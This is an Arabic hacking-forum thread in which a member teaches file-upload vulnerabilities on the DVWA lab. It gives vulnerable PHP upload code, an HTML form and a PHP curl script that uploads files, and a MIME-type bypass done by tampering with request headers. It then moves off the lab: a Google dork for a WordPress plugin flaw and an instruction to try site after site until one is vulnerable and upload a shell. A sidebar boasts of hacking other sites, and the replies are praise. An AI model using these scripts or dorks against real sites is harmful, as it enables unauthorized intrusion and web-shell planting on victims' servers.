1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع
  4. 2- التقنيات المٌتقدِّمه النهائية في مجال كسر الحمايات المٌتعدِّية بقواعد البيانات - الجٌزء الأول
    الكثير من الحمايات في الوقت الراهن قد تطورة إلي التقنيات المٌتعدِّيه التي لا تستطيع التقنيات البسيطه
    لذا توجب على المٌختصيين تقديم تقنيات تتناسب وهذه الحمايات الجديده قرائة الموضوع

[ شرح ] تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

الموضوع في 'آمن المواقع والسيرفرات' بواسطة V!rus-MarOc, بتاريخ ‏16 يناير 2015.

كاتب الموضوع : V!rus-MarOc المشاهدات : 509 الردود : 8 ‏16 يناير 2015
  1. غير متصل

    V!rus-MarOc
    rankrank
    Developer

    عضو منذ:
    ‏26 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    الوظيفة:
    Hacker
    الإقامة:

    بسم الله الرحمــــن الرحيم

    السلام عليكم

    راح استخدم في الشرح مختبر الاختراق dvwa

    اول شيء اكتشاف التغرة

    نلاحظ الكود التالي


    كود PHP:
     <?php
        
    if (isset($_POST['Upload'])) {

                
    $target_path DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
                
    $target_path $target_path basename$_FILES['uploaded']['name']);

                if(!
    move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
                    
                    
    $html .= '<pre>';
                    
    $html .= 'Your image was not uploaded.';
                    
    $html .= '</pre>';
                    
                  } else {
                
                    
    $html .= '<pre>';
                    
    $html .= $target_path ' succesfully uploaded!';
                    
    $html .= '</pre>';
                    
                }

            }
    ?> 
    اكتر الدوال مسببة للتغرة انتشارا هي move_uploaded_file و copy

    الكود اعلى مصاب و الاصابة في دالة move_uploaded_file

    شرح للدالة
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    و
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    شرح الكود

    كود PHP:
     <?php
        
    if (isset($_POST['Upload'])) { // يتحقق من ادى تم طلب الرفع

                
    $target_path DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/"// مسار رفع الملف
                
    $target_path $target_path basename$_FILES['uploaded']['name']); // المسار الكامل مع اسم الملف الدي تم رفعه

                
    if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) { // يتم رفع الملف بدون التحقق من اي شيء الى المسار الموضوع اعلاه
                    
                    
    $html .= '<pre>';
                    
    $html .= 'Your image was not uploaded.'// ادا رفع الملف بنجاح يطبع الجملة التالية
                    
    $html .= '</pre>';
                    
                  } else {
                
                    
    $html .= '<pre>';
                    
    $html .= $target_path ' succesfully uploaded!'// ادا لم يرفع الملف يطبع الجملة التالية
                    
    $html .= '</pre>';
                    
                }

            }
    ?> 
    تمام ، ننتقل لكتابة الاستغلال

    الاستغلال ب html لا يحتاج شرح ، فاللغة سهلة جدا :{13}:

    كود PHP:
    <html>
    <
    form method="POST" action="http://localhost/pentest/tuto/dvwalab/vulnerabilities/upload/" enctype="multipart/form-data">
    <
    input name="uploaded" type="file" />
    <
    input type="submit" name="Upload" value="Upload" />
    </
    html>
    بعد الاستغلال

    [​IMG]

    php

    راح نستخدم مكتبة curl

    نعمل function للرفع مع مراعاة اسماء الفورم في التغرة الي هي

    كود PHP:
    uploaded
    الفنكشن كالتالي

    كود PHP:
    function upl($x$f){
        
    $ch curl_init($x); // الاتصال بالموقع
        
    $post = array(    "Upload"=>true,  // قيم البوسط المراد ارسالها ، المف و تأكيد الرفع
                        
    "uploaded"=>"@"    .    $f);
        
    curl_setopt($chCURLOPT_POSTtrue);
        
    curl_setopt($chCURLOPT_POSTFIELDS$post); // ارسال القيم
        
    curl_setopt($chCURLOPT_RETURNTRANSFER1); // العودة بسورس بعد انتهاء العملية
        
    curl_exec($ch); // تنفيد
        
    curl_close($ch); // اغلاق
    }
    و نعم تحقق من ادا تم رفع الملف

    باستخدام path في التغرة

    كود PHP:
    $target_path $target_path basename$_FILES['uploaded']['name']);
    و شكل الاستغلال سيكون كالتالي

    كود PHP:
     <?php
    set_time_limit
    (0);
    error_reporting(0);

    if(
    preg_match('/hamza/'file_get_contents("http://localhost/pentest/tuto/dvwalab/hackable/uploads/1.txt"))){ // يتحقق من الملف هل رفع
        
    echo"uploaded"// ادا رفع يطبع الجملة التالية
    }else{
        echo
    "error"// ادا لم يرفع يطبع الجملة التالية
    }

    function 
    upl($x$f){
        
    $post = array(    "Upload"=>"upload",  // قيم البوسط المراد ارسالها ، المف و تأكيد الرفع
                        
    "uploaded"=>"@"    .    $f);
        
    $ch curl_init($x); // الاتصال بالموقع
        
    curl_setopt($chCURLOPT_COOKIEFILE'cookie.txt'); // كوكيز للدخول اللوحة (غير مهم)
        
    curl_setopt($chCURLOPT_POSTtrue);
        
    curl_setopt($chCURLOPT_POSTFIELDS$post); // ارسال القيم
        
    curl_setopt($chCURLOPT_RETURNTRANSFER1); // العودة بسورس بعد انتهاء العملية
        
    $data curl_exec($ch); // تنفيد
        
    curl_close($ch); // اغلاق
        
    return $data;
    تمام ، في بعض المرات تصادف بعض المشاكل متل

    كود PHP:
     <?php
        
    if (isset($_POST['Upload'])) {

                
    $target_path DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
                
    $target_path $target_path basename($_FILES['uploaded']['name']);
                
    $uploaded_name $_FILES['uploaded']['name'];
                
    $uploaded_type $_FILES['uploaded']['type'];
                
    $uploaded_size $_FILES['uploaded']['size'];

                if ((
    $uploaded_type == "image/jpeg") && ($uploaded_size 100000)){


                    if(!
    move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
                    
                        
    $html .= '<pre>';
                        
    $html .= 'Your image was not uploaded.';
                        
    $html .= '</pre>';
                        
                      } else {
                    
                        
    $html .= '<pre>';
                        
    $html .= $target_path ' succesfully uploaded!';
                        
    $html .= '</pre>';
                        
                        }
                }
                else{
                    echo 
    '<pre>Your image was not uploaded.</pre>';
                }
            }
    ?> 
    الاختلاف او هاي الكود يتحقق من نوع الملف المرفوع و حجمه

    كود PHP:
    if (($uploaded_type == "image/jpeg") && ($uploaded_size 100000)){
    التخطي يكون بتغيير نوع الملف اتناء الارسال
    عن طريق live http headers او tamper data
    متال في الصورة

    from

    [​IMG]

    to

    [​IMG]

    و الناتج

    [​IMG]

    و شرح للاختراق بواسطتها
    ندهب الى احد مواقع الحماية او الى قسم التغرات
    ناحد اي تغرة و نشرح عليها
    كمثال التغرة التالية

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    نعمل دورك للتغرة
    كود PHP:
    inurl:plugins/wp-easycart
    و نبحت عن مواقع في google

    [​IMG]

    و تجرب موقع موقع حتى تجد موقع مصاب و ترفع عليه الشل

    الى هنا يكون انتهى الموضوع :ُeُiy:
     


    1 person likes this.
    جاري تحميل الصفحة...
  2. غير متصل

    al_98r
    Developer

    عضو منذ:
    ‏21 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    يعطيك العآآفيه على الشرح
    ماآ قصرت ..
    :ُ{10}:ُ​
     


  3. غير متصل

    karwan
    DeveloPer Plus

    عضو منذ:
    ‏7 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    الإقامة:

    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    السلام عليكم ورحمة الله وبركاته

    يـــعــطــيـــك الـــعــافـــيــه
     


  4. غير متصل

    xdvb
    rankrank
    Developer

    عضو منذ:
    ‏1 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    يعطيك العآآفيه على الشرح
     


  5. غير متصل

    nasern
    Active DeveloPer

    عضو منذ:
    ‏26 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    يعطيك العافيه
     


  6. غير متصل

    nasern
    Active DeveloPer

    عضو منذ:
    ‏26 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    ماذا تعتقد في مشاركة V!rus-MarOc؟يعجبني ويستحق التقييم
     


  7. غير متصل

    coiffa
    rank
    Developer

    عضو منذ:
    ‏1 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    موضوع رائع ويستحق التقييم
     


  8. غير متصل

    ElHaZeN
    rank
    Developer

    عضو منذ:
    ‏20 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    تسلم ايديك يا وحش
     


  9. غير متصل

    Mokhalad HaXor
    V • I • P

    عضو منذ:
    ‏3 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2,460
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Hacking
    الإقامة:

    رد: تغرات upload ، اكتشاف ، كتابة استغلال بعدة لفات برمجية

    بارك الله بيك حبيبي موضوع جميل جدآ
    لاتحرمنا من جديدك يا ورد
    {1!$7}
     


مشاركة هذه الصفحة

جاري تحميل الصفحة...